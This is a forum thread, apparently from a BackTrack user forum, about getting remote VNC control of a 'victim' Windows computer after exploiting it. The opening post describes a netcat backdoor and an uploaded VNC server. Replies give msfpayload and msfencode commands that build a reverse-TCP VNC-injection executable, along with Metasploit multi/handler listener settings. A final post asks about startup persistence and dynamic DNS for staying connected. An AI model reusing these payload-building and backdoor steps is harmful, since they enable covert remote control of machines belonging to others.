Thread: Problem With Exec VNC on Victim Comp

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    22

    Problem With Exec VNC on Victim Comp

    Hey guys,

    This is my first post! Like many, I've been lurking around this forum for months and months, soaking in all the information.

    My question:

    I've managed to exploit my victim PC and gained my reverse shell. I drop myself a nc and go on home for the day. The next day I log in via my nc - another shell, great. I go ahead and compile myself a nice UltraVNC server and toss it onto the victim remotely. I transfer the winvnc.exe and ultravnc.ini (think that's the name) file for the settings. I type "start winvnc.exe" and check - yes, it's running.

    Now back on BT3 I run wine vncviewer.exe. I type the IP - seems to connect. Then it prompts for a password... sounds good. Enter my password... and then bam! Connection closed. (Note it does not state incorrect password.)

    I tried to connect via the Windows vncviewer - it takes me all the way to the password, accepts the password, and then I get a socket write error. I have googled this, but have not come to a distinct answer. I'm using the latest UltraVNC release.

    PS
    1. I have also tried a RealVNC server to upload - still problems connecting.
    2. I'm running BT3 on a VM on the same computer as my victim.
    3. If I load the same VNC server manually via flash drive onto a victim comp and try to connect via wine vncviewer on BT3, it works fine.
    4. I have already watched purehate's video.

    Thanks in advance!

  2. #2
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    I would use msfpayload...

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe

    That will generate a win32 executable payload located in this directory: /pentest/exploit/framework3/

    Before you send this to your victim you need to start a multi handler... start Metasploit, then use these commands...

    use exploit/multi/handler
    set PAYLOAD windows/vncinject/reverse_tcp
    set LHOST 192.168.1.5
    set LPORT 999

    Note: LHOST and LPORT must be the same in both the executable and the multi handler... LHOST is the IP address of the attacking computer (BackTrack)...

    Now that you have the multi handler set up to listen for incoming connections, all you need to do is send the payload to the victim to execute...

  3. #3
    Member kazalku
    Join Date
    Feb 2009
    Posts
    416

    Originally posted by BigMac:
    i would use msfpayload...

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe

    I got an error msg:

    bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.4 LPORT=999 X -o reverse_vnc.exe
    Error generating payload: The argument could not be parsed correctly.

    This one worked for me:

    bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.4 LPORT=999 R | ./msfencode -b '' -t exe -o reverse_vnc.exe
    [*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)

    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    My syntax is wrong... I'm lazy... sorry... you can search the forum for msfpayload, I have made lots of posts on the subject...

  5. #5
    Member kazalku
    Join Date
    Feb 2009
    Posts
    416

    The intention was not to find an error in your command; I was wondering whether maybe I was missing something. I thought that maybe it's possible to do the same job with a shorter command (like yours). Anyway, it's sorted. Thanks for the approach.

  6. #6
    coool
    Guest

    Code:
    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe
    That command does not work. Why use X -o, understand? Test with this command:

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 V > /tmp/reverse_vnc.exe
    Don't forget to use DisableCourtesyShell=True if you want to disable this:
    http://img140.imageshack.us/img140/8664/vnc.png
    I don't know if I can modify the code to add something like enabling file transfer in VNC and putting it automatically in Windows startup, and if I can use no-ip without a real IP. I hope I can, because sometimes the internet disconnects, but using no-ip would be very nice.

    If anyone has some info about that, tell me!
